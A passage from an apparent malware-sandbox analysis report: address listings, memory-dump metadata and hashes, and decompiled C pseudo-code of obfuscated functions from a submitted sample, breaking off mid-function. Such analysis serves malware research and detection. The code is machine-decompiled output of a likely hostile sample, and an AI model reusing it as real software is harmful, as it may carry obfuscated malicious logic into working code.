                                                                                                                                                                                                                                                                            0x00374590
                                                                                                                                                                                                                                                                            0x00374599
                                                                                                                                                                                                                                                                            0x0037459c
                                                                                                                                                                                                                                                                            0x003745a8
                                                                                                                                                                                                                                                                            0x003745b8
                                                                                                                                                                                                                                                                            0x003745bc
                                                                                                                                                                                                                                                                            0x003745cd
                                                                                                                                                                                                                                                                            0x003745db
                                                                                                                                                                                                                                                                            0x003745de
                                                                                                                                                                                                                                                                            0x003745e5
                                                                                                                                                                                                                                                                            0x003745f5
                                                                                                                                                                                                                                                                            0x00374607
                                                                                                                                                                                                                                                                            0x00374614
                                                                                                                                                                                                                                                                            0x0037461d
                                                                                                                                                                                                                                                                            0x00374633
                                                                                                                                                                                                                                                                            0x00374636
                                                                                                                                                                                                                                                                            0x0037463f
                                                                                                                                                                                                                                                                            0x0037464e
                                                                                                                                                                                                                                                                            0x0037465a
                                                                                                                                                                                                                                                                            0x00374666
                                                                                                                                                                                                                                                                            0x00374674
                                                                                                                                                                                                                                                                            0x00374692
                                                                                                                                                                                                                                                                            0x0037469d
                                                                                                                                                                                                                                                                            0x003746bd
                                                                                                                                                                                                                                                                            0x003746c6
                                                                                                                                                                                                                                                                            0x003746c9
                                                                                                                                                                                                                                                                            0x003746cc
                                                                                                                                                                                                                                                                            0x003746d0
                                                                                                                                                                                                                                                                            0x003746d4
                                                                                                                                                                                                                                                                            0x003746d5
                                                                                                                                                                                                                                                                            0x003746da
                                                                                                                                                                                                                                                                            0x003746dd
                                                                                                                                                                                                                                                                            0x003746fd
                                                                                                                                                                                                                                                                            0x0037470b
                                                                                                                                                                                                                                                                            0x00374711
                                                                                                                                                                                                                                                                            0x0037471a
                                                                                                                                                                                                                                                                            0x00374723
                                                                                                                                                                                                                                                                            0x00374737
                                                                                                                                                                                                                                                                            0x0037474e
                                                                                                                                                                                                                                                                            0x0037476c
                                                                                                                                                                                                                                                                            0x00374775
                                                                                                                                                                                                                                                                            0x0037477e
                                                                                                                                                                                                                                                                            0x00374789
                                                                                                                                                                                                                                                                            0x00374794
                                                                                                                                                                                                                                                                            0x0037479c
                                                                                                                                                                                                                                                                            0x003747b6
                                                                                                                                                                                                                                                                            0x003747b9
                                                                                                                                                                                                                                                                            0x003747bf
                                                                                                                                                                                                                                                                            0x003747ce
                                                                                                                                                                                                                                                                            0x003747db
                                                                                                                                                                                                                                                                            0x003747e9
                                                                                                                                                                                                                                                                            0x00374810
                                                                                                                                                                                                                                                                            0x00374817
                                                                                                                                                                                                                                                                            0x0037481a
                                                                                                                                                                                                                                                                            0x00374827
                                                                                                                                                                                                                                                                            0x0037482f
                                                                                                                                                                                                                                                                            0x00374835
                                                                                                                                                                                                                                                                            0x0037483b
                                                                                                                                                                                                                                                                            0x0037483c
                                                                                                                                                                                                                                                                            0x0037483f
                                                                                                                                                                                                                                                                            0x00374843
                                                                                                                                                                                                                                                                            0x00374844
                                                                                                                                                                                                                                                                            0x00374849
                                                                                                                                                                                                                                                                            0x0037484f
                                                                                                                                                                                                                                                                            0x00374855
                                                                                                                                                                                                                                                                            0x00374860
                                                                                                                                                                                                                                                                            0x00374878
                                                                                                                                                                                                                                                                            0x00374885
                                                                                                                                                                                                                                                                            0x003748a0
                                                                                                                                                                                                                                                                            0x003748a9
                                                                                                                                                                                                                                                                            0x003748a9
                                                                                                                                                                                                                                                                            0x00374671
                                                                                                                                                                                                                                                                            0x00374671
                                                                                                                                                                                                                                                                            0x003748bb
                                                                                                                                                                                                                                                                            0x003748d6
                                                                                                                                                                                                                                                                            0x003748e6
                                                                                                                                                                                                                                                                            0x003748ed
                                                                                                                                                                                                                                                                            0x0037492b
                                                                                                                                                                                                                                                                            0x0037493b
                                                                                                                                                                                                                                                                            0x0037495e
                                                                                                                                                                                                                                                                            0x00374969
                                                                                                                                                                                                                                                                            0x0037496e
                                                                                                                                                                                                                                                                            0x00374971
                                                                                                                                                                                                                                                                            0x0037497a
                                                                                                                                                                                                                                                                            0x0037498d
                                                                                                                                                                                                                                                                            0x00374999
                                                                                                                                                                                                                                                                            0x003749a3
                                                                                                                                                                                                                                                                            0x003749aa
                                                                                                                                                                                                                                                                            0x003749b5
                                                                                                                                                                                                                                                                            0x003749c0
                                                                                                                                                                                                                                                                            0x003749c9
                                                                                                                                                                                                                                                                            0x003749cc
                                                                                                                                                                                                                                                                            0x003749d4
                                                                                                                                                                                                                                                                            0x003749d7
                                                                                                                                                                                                                                                                            0x003749de
                                                                                                                                                                                                                                                                            0x003749e2
                                                                                                                                                                                                                                                                            0x003749eb
                                                                                                                                                                                                                                                                            0x00374a0a
                                                                                                                                                                                                                                                                            0x00374a12
                                                                                                                                                                                                                                                                            0x00374a18
                                                                                                                                                                                                                                                                            0x00374a1e
                                                                                                                                                                                                                                                                            0x00374a22
                                                                                                                                                                                                                                                                            0x00374a37

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 31ebc43f0f3e6404cc5495bba9441e3c3e7e497d1bdc5dc0bc1899f597c9444e
                                                                                                                                                                                                                                                                            • Instruction ID: 35d40ed9cc1ab9e124a202694efce5e1c7b32ce039833ab50418a9632bd0f739
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31ebc43f0f3e6404cc5495bba9441e3c3e7e497d1bdc5dc0bc1899f597c9444e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA123674A04248CFDB28CF69D9909A97BF2FF88300B10826AFD6597366D734E855CF44
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                            			E00387EF0(signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed short _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				short _v24;
                                                                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                                                                                                                            				signed int _t324;
                                                                                                                                                                                                                                                                            				signed int _t326;
                                                                                                                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                                                                                                                            				intOrPtr _t336;
                                                                                                                                                                                                                                                                            				signed int _t351;
                                                                                                                                                                                                                                                                            				signed int _t376;
                                                                                                                                                                                                                                                                            				signed int _t377;
                                                                                                                                                                                                                                                                            				intOrPtr _t387;
                                                                                                                                                                                                                                                                            				signed int _t389;
                                                                                                                                                                                                                                                                            				signed int _t409;
                                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                                            				signed int _t432;
                                                                                                                                                                                                                                                                            				intOrPtr _t434;
                                                                                                                                                                                                                                                                            				signed char _t475;
                                                                                                                                                                                                                                                                            				signed int _t485;
                                                                                                                                                                                                                                                                            				signed char _t493;
                                                                                                                                                                                                                                                                            				signed short _t498;
                                                                                                                                                                                                                                                                            				intOrPtr _t500;
                                                                                                                                                                                                                                                                            				signed short _t504;
                                                                                                                                                                                                                                                                            				signed int _t516;
                                                                                                                                                                                                                                                                            				intOrPtr _t568;
                                                                                                                                                                                                                                                                            				intOrPtr _t570;
                                                                                                                                                                                                                                                                            				intOrPtr _t572;
                                                                                                                                                                                                                                                                            				intOrPtr _t580;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v72 =  *((intOrPtr*)(_a8 + 0x74e0));
                                                                                                                                                                                                                                                                            				_v12 = 0x1b6c;
                                                                                                                                                                                                                                                                            				_t475 =  *0x40dcb4; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcb4 = _t475 - 1;
                                                                                                                                                                                                                                                                            				_t409 =  *0x40dd00; // 0x0
                                                                                                                                                                                                                                                                            				_v76 = ( *0x40dcb4 & 0x000000ff) %  *(_a8 + _t409 * 4);
                                                                                                                                                                                                                                                                            				_v80 =  *0x40dcc0 & 0x0000ffff | 0x00000fdd;
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                            				_v52 = _a4 / 0x1d70;
                                                                                                                                                                                                                                                                            				_t324 =  *0x40dca8; // 0x0
                                                                                                                                                                                                                                                                            				_v64 = _t324 %  *0x40dcd0;
                                                                                                                                                                                                                                                                            				_t485 =  *0x40dca8; // 0x0
                                                                                                                                                                                                                                                                            				_v84 = _t485;
                                                                                                                                                                                                                                                                            				_t326 =  *0x40dce4; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dce4 = _t326 + 1;
                                                                                                                                                                                                                                                                            				_t328 =  *0x40dcb8; // 0x0
                                                                                                                                                                                                                                                                            				_v88 = _t328 %  *0x40dce4;
                                                                                                                                                                                                                                                                            				_v92 = _a4 / _a4;
                                                                                                                                                                                                                                                                            				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                            				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                            				_v20 = _a4;
                                                                                                                                                                                                                                                                            				_v40 = _a4 |  *0x40dcb0;
                                                                                                                                                                                                                                                                            				_v68 = 0x278;
                                                                                                                                                                                                                                                                            				_t572 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				_v36 = ( *0x40dcb5 & 0x000000ff) /  *(_t572 + (_a4 << 1) * 4);
                                                                                                                                                                                                                                                                            				_t493 =  *0x40dcb6; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcb6 = _t493 - 1;
                                                                                                                                                                                                                                                                            				_v60 =  *0x40dcb6 & 0x000000ff;
                                                                                                                                                                                                                                                                            				_v16 = 0x7b4;
                                                                                                                                                                                                                                                                            				_t336 =  *0x40dcdc; // 0x0
                                                                                                                                                                                                                                                                            				_v96 =  *(_t336 + _a4 * 4) ^ 0x0000117e;
                                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_a8 + 0x16cc));
                                                                                                                                                                                                                                                                            				_v48 = _a4;
                                                                                                                                                                                                                                                                            				_v32 = ( *0x40dcc0 & 0x0000ffff) * _a4;
                                                                                                                                                                                                                                                                            				_t498 =  *0x40dcc0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcc0 = _t498 - 1;
                                                                                                                                                                                                                                                                            				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                            				_t423 =  *0x40dd00; // 0x0
                                                                                                                                                                                                                                                                            				_t500 =  *0x40dcf4; // 0x0
                                                                                                                                                                                                                                                                            				_v56 =  *((intOrPtr*)(_t500 + 4 + _t423 * 4));
                                                                                                                                                                                                                                                                            				_v100 = _a4;
                                                                                                                                                                                                                                                                            				_v104 =  *0x40dcb5 & 0x000000ff ^  *(_a8 + 0x1f2c);
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				_v28 = ( *0x40dcb4 & 0x000000ff) % 0x17c;
                                                                                                                                                                                                                                                                            				_t504 =  *0x40dcc0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcc0 = _t504 - 1;
                                                                                                                                                                                                                                                                            				_v44 = ( *0x40dcb6 & 0x000000ff) *  *(_a8 + ( *0x40dcc0 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                            				_a4 = _a4 + 1;
                                                                                                                                                                                                                                                                            				_t570 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcb4 = _a4 /  *(_t570 + 0xadc) % _a4 - ( *0x40dcb4 & 0x000000ff);
                                                                                                                                                                                                                                                                            				_t351 =  *0x40dce8; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dce8 = _t351 - 1;
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				_t432 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				_t516 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				 *(_v40 + _t516 * 4) = ( *(_v56 +  *0x40dcb0 * 3 * 4) * 0x00001eb5 /  *0x40dce0 ^  *0x40dce8) /  *(_v40 + _t432 * 4);
                                                                                                                                                                                                                                                                            				_t434 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v36 + _v32 * 3 * 4)) = 0xa9c -  *((intOrPtr*)(_t434 + 0x24f8)) -  *((intOrPtr*)(_v36 + _v32 * 3 * 4));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v52 + _v32 * 4)) =  *(_a8 + 0x3f10) ^  *(_v36 + (_v12 & 0x0000ffff) * 4) ^  *(_v52 + _v32 * 4);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_a8 + _v32 * 4)) = 0xdd9 % _a4 / ( *0x40dcb4 & 0x000000ff) +  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_a8 + _a4 * 4)) = ( *(_v48 + _v32 * 3 * 4) ^ 0x00000798) * _v32 +  *((intOrPtr*)(_a8 + _a4 * 4));
                                                                                                                                                                                                                                                                            				_v44 = _v44 - 1;
                                                                                                                                                                                                                                                                            				_v5 =  *((intOrPtr*)(_v40 + _v44 * 3 * 4)) + (_v12 & 0x0000ffff) ^ 0x00000f02;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v36 + (_v20 & 0x0000ffff) * 3 * 4)) =  *(_v36 + (_v20 & 0x0000ffff) * 3 * 4) ^ 0x000002b7;
                                                                                                                                                                                                                                                                            				_t376 =  *0x40dcd0; // 0x0
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_a8 + _a4 * 3 * 4)) !=  *((intOrPtr*)(_v40 + _t376 * 4))) {
                                                                                                                                                                                                                                                                            					_t377 =  *0x40dcd0; // 0x0
                                                                                                                                                                                                                                                                            					_v68 = _t377;
                                                                                                                                                                                                                                                                            					_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v36 + ((_v12 & 0x0000ffff) << 1) * 4)) = (_v16 & 0x0000ffff ^ 0x00000a3c) % ( *0x40dcb4 & 0x000000ff) *  *(_v36 + ((_v12 & 0x0000ffff) << 1) * 4);
                                                                                                                                                                                                                                                                            					_v12 = _v12 - 1;
                                                                                                                                                                                                                                                                            					_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                            					_t387 = M0040DCC8; // 0x0
                                                                                                                                                                                                                                                                            					return _t387 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t389 =  *0x40dce4; // 0x0
                                                                                                                                                                                                                                                                            				 *(_a8 +  *0x40dd00 * 3 * 4) = _t389 /  *(_a8 +  *0x40dd00 * 3 * 4);
                                                                                                                                                                                                                                                                            				 *0x40dce4 = (_a4 &  *(_a8 + 0x64 + _a4 * 4)) +  *0x40dce4;
                                                                                                                                                                                                                                                                            				 *(_v48 + _a4 * 4) = 0x1992 %  *(_v48 + _a4 * 4);
                                                                                                                                                                                                                                                                            				_v24 = (_a4 ^ 0x000007b1) % _a4;
                                                                                                                                                                                                                                                                            				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_a8 + _a4 * 4)) = _v32 %  *(_v60 + _a4 * 4);
                                                                                                                                                                                                                                                                            				_t580 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            				_v44 =  *(_v64 + (_v32 << 1) * 4) |  *(_t580 + 8 + _a4 * 4);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_a8 + (_v12 & 0x0000ffff) * 4)) = _a4 -  *(_a8 + _a4 * 4) ^  *(_a8 + (_v12 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                            				_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                            				_t568 = M0040DCC8; // 0x0
                                                                                                                                                                                                                                                                            				return _t568 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                                            			}




















































                                                                                                                                                                                                                                                                            0x00387f09
                                                                                                                                                                                                                                                                            0x00387f11
                                                                                                                                                                                                                                                                            0x00387f15
                                                                                                                                                                                                                                                                            0x00387f1e
                                                                                                                                                                                                                                                                            0x00387f2b
                                                                                                                                                                                                                                                                            0x00387f39
                                                                                                                                                                                                                                                                            0x00387f49
                                                                                                                                                                                                                                                                            0x00387f4c
                                                                                                                                                                                                                                                                            0x00387f56
                                                                                                                                                                                                                                                                            0x00387f65
                                                                                                                                                                                                                                                                            0x00387f68
                                                                                                                                                                                                                                                                            0x00387f75
                                                                                                                                                                                                                                                                            0x00387f78
                                                                                                                                                                                                                                                                            0x00387f7e
                                                                                                                                                                                                                                                                            0x00387f81
                                                                                                                                                                                                                                                                            0x00387f89
                                                                                                                                                                                                                                                                            0x00387f8e
                                                                                                                                                                                                                                                                            0x00387f9b
                                                                                                                                                                                                                                                                            0x00387fa6
                                                                                                                                                                                                                                                                            0x00387faf
                                                                                                                                                                                                                                                                            0x00387fb8
                                                                                                                                                                                                                                                                            0x00387fbf
                                                                                                                                                                                                                                                                            0x00387fcc
                                                                                                                                                                                                                                                                            0x00387fcf
                                                                                                                                                                                                                                                                            0x00387fe2
                                                                                                                                                                                                                                                                            0x00387fe8
                                                                                                                                                                                                                                                                            0x00387fec
                                                                                                                                                                                                                                                                            0x00387fef
                                                                                                                                                                                                                                                                            0x00387ff8
                                                                                                                                                                                                                                                                            0x00388005
                                                                                                                                                                                                                                                                            0x0038800d
                                                                                                                                                                                                                                                                            0x00388014
                                                                                                                                                                                                                                                                            0x00388022
                                                                                                                                                                                                                                                                            0x00388037
                                                                                                                                                                                                                                                                            0x0038803e
                                                                                                                                                                                                                                                                            0x0038804c
                                                                                                                                                                                                                                                                            0x0038804f
                                                                                                                                                                                                                                                                            0x0038805a
                                                                                                                                                                                                                                                                            0x00388067
                                                                                                                                                                                                                                                                            0x0038806a
                                                                                                                                                                                                                                                                            0x00388070
                                                                                                                                                                                                                                                                            0x0038807a
                                                                                                                                                                                                                                                                            0x00388080
                                                                                                                                                                                                                                                                            0x0038809b
                                                                                                                                                                                                                                                                            0x003880a5
                                                                                                                                                                                                                                                                            0x003880ad
                                                                                                                                                                                                                                                                            0x003880b1
                                                                                                                                                                                                                                                                            0x003880bc
                                                                                                                                                                                                                                                                            0x003880d8
                                                                                                                                                                                                                                                                            0x003880e1
                                                                                                                                                                                                                                                                            0x003880f6
                                                                                                                                                                                                                                                                            0x0038810b
                                                                                                                                                                                                                                                                            0x00388111
                                                                                                                                                                                                                                                                            0x00388119
                                                                                                                                                                                                                                                                            0x0038812f
                                                                                                                                                                                                                                                                            0x0038813c
                                                                                                                                                                                                                                                                            0x00388145
                                                                                                                                                                                                                                                                            0x00388149
                                                                                                                                                                                                                                                                            0x00388152
                                                                                                                                                                                                                                                                            0x00388160
                                                                                                                                                                                                                                                                            0x0038817f
                                                                                                                                                                                                                                                                            0x003881ac
                                                                                                                                                                                                                                                                            0x003881d5
                                                                                                                                                                                                                                                                            0x003881fb
                                                                                                                                                                                                                                                                            0x00388204
                                                                                                                                                                                                                                                                            0x0038821d
                                                                                                                                                                                                                                                                            0x0038823c
                                                                                                                                                                                                                                                                            0x00388243
                                                                                                                                                                                                                                                                            0x00388254
                                                                                                                                                                                                                                                                            0x00388335
                                                                                                                                                                                                                                                                            0x0038833a
                                                                                                                                                                                                                                                                            0x00388345
                                                                                                                                                                                                                                                                            0x00388359
                                                                                                                                                                                                                                                                            0x00388372
                                                                                                                                                                                                                                                                            0x0038837d
                                                                                                                                                                                                                                                                            0x00388387
                                                                                                                                                                                                                                                                            0x00388390
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00388395
                                                                                                                                                                                                                                                                            0x00388264
                                                                                                                                                                                                                                                                            0x00388278
                                                                                                                                                                                                                                                                            0x0038828e
                                                                                                                                                                                                                                                                            0x003882aa
                                                                                                                                                                                                                                                                            0x003882ba
                                                                                                                                                                                                                                                                            0x003882c4
                                                                                                                                                                                                                                                                            0x003882db
                                                                                                                                                                                                                                                                            0x003882e9
                                                                                                                                                                                                                                                                            0x003882f6
                                                                                                                                                                                                                                                                            0x00388316
                                                                                                                                                                                                                                                                            0x0038831f
                                                                                                                                                                                                                                                                            0x00388328
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: db31317091b058808e1694415dc6cfd63cde390aa3f20c63158d416f6fa0c24b
                                                                                                                                                                                                                                                                            • Instruction ID: 8808345db7411b16d29b19be993f85cfeb995af0ef2659af11e9225574cb7098
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db31317091b058808e1694415dc6cfd63cde390aa3f20c63158d416f6fa0c24b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9F14E74E08208DFDB08CFA8D5909ADBBB2FF89310F14C16AE855AB354CB75A955CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e48ce0fdaf3a794dcc974115d4525671edefd104a254892a1326e0110d0531ba
                                                                                                                                                                                                                                                                            • Instruction ID: d940b7d26f632d413325353d010c39b6658ade30040436ce0fc8c0b98f5a9033
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e48ce0fdaf3a794dcc974115d4525671edefd104a254892a1326e0110d0531ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84B10321D2AF514DD323A6398831336B69CAFBB2D5F55D71BFC1BB4D22EB2295834240
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00388960(signed int* _a4, signed int _a8, intOrPtr _a24, signed int _a28) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _t184;
                                                                                                                                                                                                                                                                            				intOrPtr _t199;
                                                                                                                                                                                                                                                                            				intOrPtr _t200;
                                                                                                                                                                                                                                                                            				intOrPtr _t203;
                                                                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                                                                            				intOrPtr _t214;
                                                                                                                                                                                                                                                                            				intOrPtr _t218;
                                                                                                                                                                                                                                                                            				intOrPtr _t275;
                                                                                                                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                                                                                                                            				intOrPtr _t279;
                                                                                                                                                                                                                                                                            				intOrPtr _t284;
                                                                                                                                                                                                                                                                            				intOrPtr _t293;
                                                                                                                                                                                                                                                                            				intOrPtr _t313;
                                                                                                                                                                                                                                                                            				signed int _t314;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v28 = _a28 ^ 0x00002801;
                                                                                                                                                                                                                                                                            				_v40 = _a8 ^ 0x00000edf;
                                                                                                                                                                                                                                                                            				_v16 = _a28 - 0x1df;
                                                                                                                                                                                                                                                                            				_v36 = _a24 - 0x2565;
                                                                                                                                                                                                                                                                            				_v32 = _a28 - 0x2801;
                                                                                                                                                                                                                                                                            				_v20 = _a24 - 0x9e;
                                                                                                                                                                                                                                                                            				_v12 = _a28 - 0x11c;
                                                                                                                                                                                                                                                                            				_v8 = _a8 ^ 0x00000173;
                                                                                                                                                                                                                                                                            				if(_v16 <= _v8 - 0x10f) {
                                                                                                                                                                                                                                                                            					if( *0x40d45c >= 0x111b0) {
                                                                                                                                                                                                                                                                            						_t314 =  *0x40d470; // 0x38f7708d
                                                                                                                                                                                                                                                                            						_t203 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t205 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t205 + 0x10c)) = (_t314 ^ _a4[0x2e]) +  *((intOrPtr*)(_t203 + 0x10c)) - 0x38e6b3f1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_a4[0x19] = _a4[0x19] + 0x658f2;
                                                                                                                                                                                                                                                                            					if( *0x40d428 <= 0xb84a) {
                                                                                                                                                                                                                                                                            						_t214 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t214 + 0xf8)) = (_a4[0x3d] ^ _a4[0x2d]) + 0x32ec7;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t313 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t199 =  *0x40d4cc; // 0x40d3a8
